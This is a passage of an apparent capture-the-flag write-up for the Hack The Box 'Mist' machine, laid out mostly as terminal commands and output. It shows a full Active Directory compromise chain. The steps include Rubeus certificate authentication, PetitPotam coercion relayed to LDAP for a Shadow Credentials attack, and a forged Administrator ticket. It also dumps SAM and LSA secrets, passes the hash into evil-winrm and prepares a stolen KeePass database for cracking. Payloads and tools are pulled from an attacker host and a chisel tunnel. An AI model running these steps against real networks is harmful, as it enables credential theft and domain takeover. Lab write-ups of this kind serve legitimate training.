MIIEpQIBAAKCAQEAu2g0pCuNWkGeSnyM8sAFy4SL7q9695Rl4LHqanL7y2vDLsyp
4gsytzQ3c+euF3q9jYRo4PkH06DYshbWfGL8p04C7Gs56RnJL1urjiqfkg7KXc/b
cjxglQ0qqYKl+j43uHQpbUkYGSDQAytkKVlKFbUcYi8yzW/8dqLH45ZkCLSrtWeP
IJnC5BSgucOu6WswI6j+vxpDMPYCWaOYGkiFdqVT2OlD1unvrpXBrJQptIPwEYXA
Yo3gQDNEBE2/V+trtnSha0tTkrMbYVcGuUvL1sLQZQrXAqms1YTIjsfnOBLuy1Z+
pSFp3cZHz0PjdpABhEc+GuDEnQQpVlwVOyecMQIDAQABAoIBAFQESp1THSLaiiFw
pyvpJG/yM13FdAZslCPg/2vLstCmtjFT9dFuHcV+dmHS+vxxvWslcnNxka2xzZRB
otTO99/1nF/rTmIPel9t5IJu32z2jojyN7qGEPKhnX+zH8AJhqd+BFiHTXNuf3L8
UAItkoYa1Oe7qzXov7FcFusUMDKqLu5r0pWYnAgI1RzZQdgKVG1RCmlDctkbnptu
oUhiPj+cbkLGu9OyzgSQzlqTtDA47cDpTYBhLkZX4S4g81nE7q6aeblRh04aMDFA
1Za+8BFcRE1vzWhKV5uhMmMcRwalb01QqJQul83W1lZOfcYwi5DSx5tswSc9ATb7
WIhiZ8UCgYEA9+HA3KYVs2mJZ/XY1aWWPdFIag+ZL0vmcFXJR0YmNiKprDJfE1dA
OEn+X6Yg4kIn+/CKb3zyJHTk+RokUBnpfLfTOnbDY0zSEyzfYy2KsarNI5OXqogP
/eGynT+2ycrk4GjlVkuH8rNdvP0ES/Cju0BOT1GCdz8MJsTTS2C3h5MCgYEAwYtu
KGF7PMFQHFZSE1yF9UdTMO0tRiWsVtXLD8JNarbzCepNPqLkrjTCBFIvJz5ia0GE
F0MuZU2gZEmGl0pF7UGN9dogyYvgOlYbwqw9rNz0d4XLAxLJJ0EvuMN6G1YENSJJ
pz2PJjeRe9DoeAB6lEVUIRF1ICMpoJS37AUN36sCgYEAilSsiTYSNC44JRD4cbnX
jyXksHOF+/PyZEwraCAIoPtVDqiJkESHrSH117Dg9wMORzWkO7VRd/DX+v+QtjbP
qu727NBsF1U+gr7u5uz6Uk3L7welguAtdHPodoKg4hndAjLnkPHTqyhXrmjQZgSj
ipLHYNJO6XcAs/3xIEaYBQsCgYEAthnYFYpSh4FjPKZDJxBgwbzQGzKs7Fk546HY
IwWwDX4BAg0/jHV7MCVXfvVMhGH/++Zyv+hn2MzG4lUDm4k4bdjGFtGbE8bVvE2U
ZP/mL6TdJy/tKQEd3h9JJVBWrS2rW8rc/cu/yjdyXMrcTzw0GRl55Hsmdoxe+EW1
Hw5KVW0CgYEA79TmycKWpJLET9P3bqANoJIIunzcypEEUWRodQ1PFuj/2gGLC4iX
IuhitJODnYXo2d5zO17ATuUVaXJjZzOisrlLmhT9e4tfS3yj7ABXLi1Mv3WoNwVd
hVNW6k4qV+Lb73iEJD8Z+W7tEHx06qVs6FnJO4Toasew/Xtwn0nrIZ0=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGDzCCBPegAwIBAgITIwAAADxgF119PJQfHAAAAAAAPDANBgkqhkiG9w0BAQsF
ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEbWlzdDEV
MBMGA1UEAxMMbWlzdC1EQzAxLUNBMB4XDTI0MDcxNzE4MzgxNloXDTI1MDcxNzE4
MzgxNlowVTETMBEGCgmSJomT8ixkARkWA2h0YjEUMBIGCgmSJomT8ixkARkWBG1p
c3QxDjAMBgNVBAMTBVVzZXJzMRgwFgYDVQQDEw9CcmFuZG9uLktleXdhcnAwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7aDSkK41aQZ5KfIzywAXLhIvu
r3r3lGXgsepqcvvLa8MuzKniCzK3NDdz564Xer2NhGjg+QfToNiyFtZ8YvynTgLs
aznpGckvW6uOKp+SDspdz9tyPGCVDSqpgqX6Pje4dCltSRgZINADK2QpWUoVtRxi
LzLNb/x2osfjlmQItKu1Z48gmcLkFKC5w67pazAjqP6/GkMw9gJZo5gaSIV2pVPY
6UPW6e+ulcGslCm0g/ARhcBijeBAM0QETb9X62u2dKFrS1OSsxthVwa5S8vWwtBl
CtcCqazVhMiOx+c4Eu7LVn6lIWndxkfPQ+N2kAGERz4a4MSdBClWXBU7J5wxAgMB
AAGjggLpMIIC5TAXBgkrBgEEAYI3FAIECh4IAFUAcwBlAHIwKQYDVR0lBCIwIAYK
KwYBBAGCNwoDBAYIKwYBBQUHAwQGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDBE
BgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAw
BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFHlgPPPrCQ3m5vvlMrFxWyDO
M3zfMB8GA1UdIwQYMBaAFAJHtA9/ZUDlwTbDIo9S3fMCAFUcMIHEBgNVHR8Egbww
gbkwgbaggbOggbCGga1sZGFwOi8vL0NOPW1pc3QtREMwMS1DQSxDTj1EQzAxLENO
PUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D
b25maWd1cmF0aW9uLERDPW1pc3QsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlv
bkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBuwYI
KwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1taXN0LURD
MDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZp
Y2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWlzdCxEQz1odGI/Y0FDZXJ0aWZpY2F0
ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwMwYDVR0R
BCwwKqAoBgorBgEEAYI3FAIDoBoMGEJyYW5kb24uS2V5d2FycEBtaXN0Lmh0YjBP
BgkrBgEEAYI3GQIEQjBAoD4GCisGAQQBgjcZAgGgMAQuUy0xLTUtMjEtMTA0NTgw
OTUwOS0zMDA2NjU4NTg5LTI0MjYwNTU5NDEtMTExMDANBgkqhkiG9w0BAQsFAAOC
AQEAluElfX8friW1MTC6xVI1O26WuI1aP5DbAS40JHBtBHf+SVLYcZqFs3dCir5q
QByOLc1kh8e6xFPhJ0iS/nkIwgFOTy8BEwKRxHDPKLlpolG33YEeLENia/P3t0Od
lTiCjVcJybDqwJRvb7vukNZyfMZYjNcPLwkmJ1AKQ3FdmvEG+tqgKq3TpPDheNpF
pBJseB4bMHnEKrgYwHDoud10nJ8Bi0KhqMuqV5kZXV8tyrXyehiCwmy9+vlNkve5
r5yL1maGvT6vJ/JofYp9ejfc0/J7XurZsU/XiCbjdpeCzI9pvbvplmZpNI+qe9Kb
ruFuosn9K//tnnnykzuU2SifvQ==
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:05.6046662

└─$ vi cert.pem
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Enter Export Password: Password123$
Verifying - Enter Export Password: Password123$
└─$ mv cert.pfx www

Get Ticket

For next step run Rubeus and ask for ticket:

PS C:\xampp\htdocs\files> iwr 10.10.14.73/cert.pfx -outfile cert.pfx
PS C:\xampp\htdocs\files> iwr 10.10.14.73/Rubeus.exe -outfile rb.exe
PS C:\xampp\htdocs\files> .\rb.exe asktgt /user:$ENV:USERNAME /certificate:C:\xampp\htdocs\files\cert.pfx /password:'Password123$' /getcredentials /show /nowrap
  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mist.htb\Brandon.Keywarp'
[*] Using domain controller: 192.168.100.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/mist.htb
  ServiceRealm             :  MIST.HTB
  UserName                 :  Brandon.Keywarp
  UserRealm                :  MIST.HTB
  StartTime                :  7/17/2024 11:54:23 AM
  EndTime                  :  7/17/2024 9:54:23 PM
  RenewTill                :  7/24/2024 11:54:23 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  wMLcmCKd0Q3qzzHT71sbxA==
  ASREP (key)              :  82FFE546360BA580853FBE2E5B2DB524

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : DB03D6A77A2205BC1D07082740626CC9

Brandon User NTLM

We are able to authenticate with NTLM hash:

└─$ proxychains netexec smb 192.168.100.100 -u 'mist.htb\Brandon.Keywarp' -H 'DB03D6A77A2205BC1D07082740626CC9' --shares
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.100 445    DC01             [+] mist.htb\Brandon.Keywarp:DB03D6A77A2205BC1D07082740626CC9
SMB         192.168.100.100 445    DC01             [*] Enumerated shares
SMB         192.168.100.100 445    DC01             Share           Permissions     Remark
SMB         192.168.100.100 445    DC01             -----           -----------     ------
SMB         192.168.100.100 445    DC01             ADMIN$                          Remote Admin
SMB         192.168.100.100 445    DC01             C$                              Default share
SMB         192.168.100.100 445    DC01             IPC$            READ            Remote IPC
SMB         192.168.100.100 445    DC01             NETLOGON        READ            Logon server share
SMB         192.168.100.100 445    DC01             SYSVOL          READ            Logon server share

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mist/www]
└─$ proxychains netexec smb 192.168.100.101 -u 'mist.htb\Brandon.Keywarp' -H 'DB03D6A77A2205BC1D07082740626CC9' --shares
SMB         192.168.100.101 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:mist.htb) (signing:False) (SMBv1:False)
SMB         192.168.100.101 445    MS01             [+] mist.htb\Brandon.Keywarp:DB03D6A77A2205BC1D07082740626CC9
SMB         192.168.100.101 445    MS01             [*] Enumerated shares
SMB         192.168.100.101 445    MS01             Share           Permissions     Remark
SMB         192.168.100.101 445    MS01             -----           -----------     ------
SMB         192.168.100.101 445    MS01             ADMIN$                          Remote Admin
SMB         192.168.100.101 445    MS01             C$                              Default share
SMB         192.168.100.101 445    MS01             Common Applications READ,WRITE
SMB         192.168.100.101 445    MS01             IPC$            READ            Remote IPC

PetitPotam

└─$ proxychains python3 PetitPotam.py -u 'Brandon.Keywarp' -hashes ':DB03D6A77A2205BC1D07082740626CC9' -pipe all -d mist.htb 10.10.14.73 192.168.100.101
---
└─$ sudo responder -I tun0
[SMB] NTLMv2-SSP Client   : 10.10.11.17
[SMB] NTLMv2-SSP Username : MIST\MS01$
[SMB] NTLMv2-SSP Hash     : MS01$::MIST:a00d8a89c3f38494:52A8227093C3EAEA6EF6D233F60933D8:0101000000000000808B8CFE5ED8DA0193FA44BB2E967B190000000002000800500057004F00430001001E00570049004E002D0031004F004A005200340051004B0048004B005200350004003400570049004E002D0031004F004A005200340051004B0048004B00520035002E00500057004F0043002E004C004F00430041004C0003001400500057004F0043002E004C004F00430041004C0005001400500057004F0043002E004C004F00430041004C0007000800808B8CFE5ED8DA01060004000200000008003000300000000000000000000000004000008BDEE34C945C999D040FD897EDED9E3FDADEB2F83408CE41B51DA87829968EE70A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370033000000000000000000

PetitPotam attack is successful!

Writeup-10.png

Crack the hash:

➜ .\hashcat.exe --show .\hashes
...
5600 | NetNTLMv2 | Network Protocol
...
➜ .\hashcat.exe -a 0 -m 5600 .\hashes .\rockyou.txt
...
Status...........: Exhausted
...

Unsuccessful...

Shadow Credentials

We can perform Shadow Credentials attack via PetitPotam PoC.

The attack should take place like:

Writeup-11.png

└─$ chisel server -p 36001
2024/07/18 01:06:00 server: Fingerprint tj15IDySSod3bMia5kDlPuu2K19SV+9rd/OU1IrFZwg=
2024/07/18 01:06:00 server: Listening on http://0.0.0.0:36001
---
PS C:\xampp\htdocs\files> Start-Job -ScriptBlock { & "C:\xampp\htdocs\files\chisel.exe" client 10.10.14.73:36001 4444:10.10.14.73:80; }
PS C:\xampp\htdocs\files> Receive-Job 5
...
2024/07/17 22:09:54 client: tun: proxy#4444=>10.10.14.73:80: Listening
2024/07/17 22:09:55 client: Connected (Latency 78.5714ms)

Verify connection:

Writeup-12.png

Without WebDAV this was not working, enable script can be found here: HOW TO START A “TRIGGER START” WINDOWS SERVICE WITH POWERSHELL WITHOUT ELEVATION / ADMIN RIGHTS

The script is like a steroid for PetitPotam and should be ran before any PetitPotam command.

impacket yet doesn't have support for shadow credentials in interactive mode, it can be added via this pull request: Add Shadow Credentials Commands to Ntlmrelayx's Interactive LDAP Shell #1402

PS C:\xampp\htdocs\files> . .\enablewebdav.ps1
---
└─$ git clone https://github.com/Tw1sm/impacket.git -b interactive-ldap-shadow-creds
└─$ cd impacket
└─$ python -m venv venv
└─$ source ./venv/bin/activate
└─$ pip install -e .
# └─$ pip install pyOpenSSL==24.0.0 # Needed?
└─$ proxychains python examples/ntlmrelayx.py -t ldap://192.168.100.100 -domain mist.htb -smb2support -i
---
└─$ proxychains python3 PetitPotam.py -u 'Brandon.Keywarp' -hashes ':DB03D6A77A2205BC1D07082740626CC9' -pipe all -d mist.htb MS01@4444/yada 192.168.100.101

Writeup-13.png

Connect to ldap and perform Shadow Credentials attack:

└─$ nc 0 11000
Type help for list of commands

# help

 add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
 rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
 add_user new_user [parent] - Creates a new user.
 add_user_to_group user group - Adds a user to a group.
 change_password user [password] - Attempt to change a given users password. Requires LDAPS.
 clear_rbcd target - Clear the resource based constrained delegation configuration information.
 clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
 disable_account user - Disable the users account.
 enable_account user - Enable the users account.
 dump - Dumps the domain.
 search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
 get_user_groups user - Retrieves all groups this user is a member of.
 get_group_users group - Retrieves all members of a group.
 get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
 grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
 set_dontreqpreauth user true/false - Set the dont require pre-authentication flag to true or false.
 set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
 set_shadow_creds target - Set shadow credentials on the target object (sAMAccountName).
 start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
 write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
 exit - Terminates this session.

# clear_shadow_creds MS01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108

Shadow credentials cleared successfully!

# set_shadow_creds MS01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108

KeyCredential generated with DeviceID: 0045b24e-7352-207f-8474-01870d422f59
Shadow credentials successfully added!
Saved PFX (#PKCS12) certificate & key at path: GtVRpuZy.pfx
Must be used with password: nlM1OVwbcXjdSqv21Go5

To check if the .pfx file is readable and the password is correct, we can try extracting the certificate and key using OpenSSL to verify:

└─$ mv ./impacket/GtVRpuZy.pfx .
└─$ openssl pkcs12 -in GtVRpuZy.pfx -nodes -passin pass:nlM1OVwbcXjdSqv21Go5 | openssl x509 -noout -text

Writeup-14.png

The result tells us it's a a self-signed certificate, as the subject and issuer being the same as MS01$. Rather than the one from Brandon that indicates CN and DC attributes.

└─$ certipy-ad cert -pfx GtVRpuZy.pfx -password nlM1OVwbcXjdSqv21Go5 -export -out brandon.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'brandon.pfx'
└─$ proxychains certipy-ad auth -pfx brandon.pfx -username 'MS01$' -domain mist.htb -dc-ip 192.168.100.100 -debug
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:88  ...  OK
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:88  ...  OK
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:e8c4ceb3a5abb43cb0ffc352caf843ae

Now we have a new PFX certificate, which we can also use Openssl to verify it without the password this time. Then we just authenticate the new PFX just like what we have done before for the Pass the Certificate attack, only now we are targeting the user MS01$.

After this we retrieve the NTLM hash for the computer account MS01$, which is typically the account associated with a domain controller or server in an AD environment.

This hash can be used to authenticate to services that accept NTLM challenge/response authentication.

└─$ proxychains netexec smb 192.168.100.100 -u MS01$ -H e8c4ceb3a5abb43cb0ffc352caf843ae --rid-brute
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.100 445    DC01             [+] mist.htb\MS01$:e8c4ceb3a5abb43cb0ffc352caf843ae
SMB         192.168.100.100 445    DC01             500: MIST\Administrator (SidTypeUser)
SMB         192.168.100.100 445    DC01             501: MIST\Guest (SidTypeUser)
SMB         192.168.100.100 445    DC01             502: MIST\krbtgt (SidTypeUser)
SMB         192.168.100.100 445    DC01             1000: MIST\DC01$ (SidTypeUser)
SMB         192.168.100.100 445    DC01             1124: MIST\svc_ca$ (SidTypeUser)
SMB         192.168.100.100 445    DC01             1125: MIST\svc_smb (SidTypeUser)
SMB         192.168.100.100 445    DC01             1135: MIST\svc_cabackup (SidTypeUser)

Enumerate SIDs

└─$ proxychains impacket-lookupsid -hashes ':e8c4ceb3a5abb43cb0ffc352caf843ae' 'mist.htb/MS01$@DC01.mist.htb' 0
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Brute forcing SIDs at DC01.mist.htb
[*] StringBinding ncacn_np:DC01.mist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1045809509-3006658589-2426055941

The 0 at the end is typically used to specify the RID (Relative Identifier) for enumeration.

With the NTLM hash & SID, we can then use impacket-ticketer to create a fake or forged Kerberos ticket (TGT).

PS C:\xampp\htdocs\files> setspn -L MS01
Registered ServicePrincipalNames for CN=MS01,CN=Computers,DC=mist,DC=htb:
        tapinego/MS01
        tapinego/MS01.mist.htb
        TERMSRV/MS01
        TERMSRV/MS01.mist.htb
        WSMAN/MS01
        WSMAN/MS01.mist.htb
        RestrictedKrbHost/MS01.mist.htb
        HOST/MS01.mist.htb
        RestrictedKrbHost/MS01
        HOST/MS01

└─$ proxychains impacket-ticketer -domain mist.htb -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -spn 'HOST/MS01.mist.htb' -nthash e8c4ceb3a5abb43cb0ffc352caf843ae -user-id 500 Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mist.htb/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Pass-The-Ticket

Finally, with the TGT for Administrator, we can use impacket-secretsdump to dump credentials:

└─$ KRB5CCNAME=Administrator.ccache proxychains impacket-secretsdump -k Administrator@MS01.mist.htb -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  MS01.mist.htb:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c4029c3c7681dd97b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:90f903787dd064cc1973c3aa4ca4a7c1:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39b46e16b48c8:::
[*] Dumping cached domain logon information (domain/username:hash)
MIST.HTB/Brandon.Keywarp:$DCC2$10240#Brandon.Keywarp#5f540c9ee8e4bfb80e3c732ff3e12b28: (2024-07-18 17:50:58)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
MIST\MS01$:plain_password_hex:ea225d1f20a74b171fa565789acb908809c79b5a1a30ce85bf4e090bbaf79766b5f551501d09ea68d02dca0bb380d6de957822ea3715a2fd763adb6b8a6cf494581743bb8efd1f490dd6211cb052568f9b3b09677e9100dd55947dd3a2d9fd4236f1e0d9ff36fcf6f4f2b513680f8ccee910584e8241481982f01c79d5fda9722daa5ec9addd9d9fa8ef3ff57f7cc62a6eeaf9391197e3e036e60bd8e88b398171fc591de87b2de5ae35f574335169a099e3cbd5f91e008030ad1d590886126d6c951ff6640d7cf053aa2c5ff890538d8f44d01049a0075fe07545797deeda29e72bcad964168e26213ceeaa28e16bf4
MIST\MS01$:aad3b435b51404eeaad3b435b51404ee:e8c4ceb3a5abb43cb0ffc352caf843ae:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xe464e18478cf4a7d809dfc9f5d6b5230ce98779b
dpapi_userkey:0x579d7a06798911d322fedc960313e93a71b43cc2
[*] NL$KM
 0000   57 C8 F7 CD 24 F2 55 EB  19 1D 07 C2 15 84 21 B0   W...$.U.......!.
 0010   90 7C 79 3C D5 BE CF AC  EF 40 4F 8E 2A 76 3F 00   .|y<.....@O.*v?.
 0020   04 87 DF 47 CF D8 B7 AF  6D 5E EE 9F 16 5E 75 F3   ...G....m^...^u.
 0030   80 24 AA 24 B0 7D 3C 29  4F EA 4E 4A FB 26 4E 62   .$.$.}<)O.NJ.&Nb
NL$KM:57c8f7cd24f255eb191d07c2158421b0907c793cd5becfacef404f8e2a763f000487df47cfd8b7af6d5eee9f165e75f38024aa24b07d3c294fea4e4afb264e62
[*] _SC_ApacheHTTPServer
svc_web:MostSavagePasswordEver123
[*] Cleaning up...
[*] Stopping service RemoteRegistry

Using Pass-The-Hash authenticate with evil-winrm as Administrator on MS01 machine.

└─$ proxychains evil-winrm -i 192.168.100.101 -u Administrator -H 711e6a685af1c31c4029c3c7681dd97b
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.101:5985  ...  OK
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> tree /f /a
C:.
+---Contacts
+---Desktop
|       user.txt
*Evil-WinRM* PS C:\Users\Administrator> cat desktop/user.txt
67271816f58aad52b020260599dad5ff

Privilege Escalation (DC01 op_Sharon.Mullard)

KeePass

*Evil-WinRM* PS C:\Users\Sharon.Mullard> tree /f /a
Folder PATH listing
Volume serial number is 560D-8100
C:.
+---Desktop
+---Documents
|       sharon.kdbx
|
+---Downloads
+---Pictures
|       cats.png
|       image_20022024.png
|
*Evil-WinRM* PS C:\Users\Sharon.Mullard> download Documents/sharon.kdbx
*Evil-WinRM* PS C:\Users\Sharon.Mullard> download Pictures/cats.png
*Evil-WinRM* PS C:\Users\Sharon.Mullard> download Pictures/image_20022024.png

cats.png is literally cats, but datetime image is a screenshot:

image_20022024.png

We can see partial password: UA7cpa[#1!_*ZX

Generate hash from kdbx which is KeePass database file.

└─$ keepass2john sharon.kdbx | tee sharon.hash
sharon:$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d5871520815f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc

For hashcat to work delete sharon: prefix, check hash type and start cracking with known password:

➜ .\hashcat.exe --show hashes
      # | Name                                                       | Category
  ======+============================================================+======================================
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)                | Password Manager
  29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager

